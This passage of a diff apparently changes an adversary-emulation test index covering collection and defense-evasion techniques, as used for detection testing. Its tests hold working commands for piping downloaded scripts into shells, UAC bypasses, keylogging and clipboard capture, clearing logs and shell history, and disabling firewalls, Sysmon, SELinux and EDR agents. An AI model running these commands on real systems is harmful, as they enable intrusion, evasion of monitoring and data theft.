#{input_file_folder} -' + ' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists -' + ' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration -' + ' supported_platforms: - macos - linux @@ -23717,10 +23765,10 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; -' + ' get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1; -' + ' executor: name: sh elevation_required: false @@ -23732,7 +23780,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} -' + ' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -23783,7 +23831,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet -' + ' name: powershell T1119: technique: @@ -23853,7 +23901,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1 -' + ' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -23869,7 +23917,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null -' + ' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -23957,7 +24005,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. -' + ' supported_platforms: - windows executor: @@ -23967,14 +24015,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 -' + ' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it -' + ' supported_platforms: - windows executor: @@ -23997,7 +24045,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt -' + ' supported_platforms: - windows input_arguments: @@ -24009,7 +24057,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -24020,7 +24068,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" @@ -24029,7 +24077,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore -' + ' name: powershell T1213.001: technique: @@ -24183,7 +24231,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -24199,10 +24247,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" @@ -24772,7 +24820,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -24948,7 +24996,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -24966,11 +25014,11 @@ collection: \n" prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -25143,17 +25191,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} -' + ' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore -' + ' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script -' + ' supported_platforms: - linux - macos @@ -25166,7 +25214,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -' + ' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -25188,10 +25236,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force -' + ' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore -' + ' name: powershell T1114.001: technique: @@ -25264,23 +25312,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" -' + ' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} -' + ' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore -' + ' name: powershell T1185: technique: @@ -25624,7 +25672,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) -' + ' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -25657,7 +25705,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -25668,16 +25716,16 @@ collection: executor: command: 'screencapture #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -25688,17 +25736,17 @@ collection: executor: command: 'screencapture -x #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud -' + ' supported_platforms: - linux input_arguments: @@ -25720,11 +25768,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -25732,14 +25780,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot -' + ' supported_platforms: - linux input_arguments: @@ -25750,27 +25798,27 @@ collection: dependencies: - description: 'ImageMagick must be installed -' + ' prereq_command: 'if import --version; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get -y install imagemagick -' + ' executor: command: 'import -window root #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour -' + ' supported_platforms: - windows input_arguments: @@ -25792,7 +25840,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore -' + ' T1213.002: technique: external_references: @@ -26365,10 +26413,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -26392,10 +26440,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -26433,7 +26481,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -26465,10 +26513,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 -' + ' name: command_prompt T1027.001: technique: @@ -26560,20 +26608,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) -' + ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'cp /bin/ls #{file_to_pad} -' + ' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} -' + ' cleanup_command: 'rm #{file_to_pad} -' + ' name: sh T1542.003: technique: @@ -26747,7 +26795,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -26769,7 +26817,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -26791,7 +26839,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -26814,7 +26862,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -26837,7 +26885,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -26885,7 +26933,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -26898,11 +26946,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true T1218.003: @@ -26983,7 +27031,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands -' + ' supported_platforms: - windows input_arguments: @@ -26995,24 +27043,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) -' + ' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} -' + ' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file -' + ' supported_platforms: - windows input_arguments: @@ -27024,17 +27072,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) -' + ' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au -' + ' name: command_prompt T1574.012: technique: @@ -27145,7 +27193,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -27190,7 +27238,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -27228,7 +27276,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -27313,71 +27361,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm -' + ' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history -' + ' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm -' + ' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history -' + ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history -' + ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history -' + ' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate -' + ' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history -' + ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero -' + ' supported_platforms: - linux - macos @@ -27392,7 +27440,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions -' + ' supported_platforms: - linux - macos @@ -27412,7 +27460,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file -' + ' supported_platforms: - linux - macos @@ -27427,13 +27475,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -' + ' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting -' + ' prereq_command: | /usr/sbin/useradd testuser1 echo pwd101! | passwd testuser1 --stdin @@ -27443,35 +27491,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname -' + ' cleanup_command: 'userdel -f testuser1 -' + ' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history -' + ' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing -' + ' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history -' + ' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath -' + ' name: powershell T1070.002: technique: @@ -27522,7 +27570,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs -' + ' supported_platforms: - macos - linux @@ -27538,7 +27586,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -27549,14 +27597,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} -' + ' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -27567,7 +27615,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} -' + ' name: bash T1070.001: technique: @@ -27637,7 +27685,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. -' + ' supported_platforms: - windows input_arguments: @@ -27648,7 +27696,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} -' + ' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -27677,7 +27725,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -27687,7 +27735,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) @@ -27891,10 +27939,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -27902,10 +27950,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} -' + ' cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -27927,18 +27975,18 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} -' + ' executor: command: 'Invoke-Expression #{input_file} -' + ' name: powershell T1218.001: technique: @@ -28018,17 +28066,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) -' + ' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} -' + ' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -28045,7 +28093,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} -' + ' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -28071,7 +28119,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -28104,7 +28152,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -28129,7 +28177,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -28170,7 +28218,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -28209,7 +28257,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -28363,17 +28411,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) -' + ' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} -' + ' name: command_prompt T1578.002: technique: @@ -28714,10 +28762,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -28725,7 +28773,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -28954,7 +29002,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) -' + ' supported_platforms: - windows input_arguments: @@ -29214,7 +29262,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true -' + ' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -29369,7 +29417,7 @@ defense-evasion: auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 description: 'Disables the iptables firewall -' + ' supported_platforms: - linux executor: @@ -29395,10 +29443,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off -' + ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 -' + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -29413,7 +29461,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 -' + ' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -29463,14 +29511,14 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk in users folder -' + ' prereq_command: 'if (Get-Item "C:\Users\$env:UserName\AtomicTest.exe") {exit 0} else {exit 1} -' + ' get_prereq_command: 'Copy-Item #{exe_file_path} -Destination "C:\Users\$env:UserName" -' + ' executor: command: netsh advfirewall firewall add rule name="Atomic Test" dir=in action=allow program="C:\Users\$env:UserName\AtomicTest.exe" enable=yes @@ -29533,7 +29581,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection -' + ' supported_platforms: - linux executor: @@ -29551,7 +29599,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service -' + ' supported_platforms: - linux executor: @@ -29569,19 +29617,19 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement -' + ' supported_platforms: - linux executor: command: 'setenforce 0 -' + ' name: sh - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux -' + ' supported_platforms: - linux executor: @@ -29597,7 +29645,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response -' + ' supported_platforms: - macos executor: @@ -29613,48 +29661,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper -' + ' supported_platforms: - macos executor: command: 'sudo spctl --master-disable -' + ' cleanup_command: 'sudo spctl --master-enable -' + ' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -29662,7 +29710,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS -' + ' supported_platforms: - macos input_arguments: @@ -29700,40 +29748,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded -' + ' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed -' + ' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded -' + ' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} -' + ' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -29745,7 +29793,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion -' + ' supported_platforms: - windows input_arguments: @@ -29758,10 +29806,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available -' + ' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} 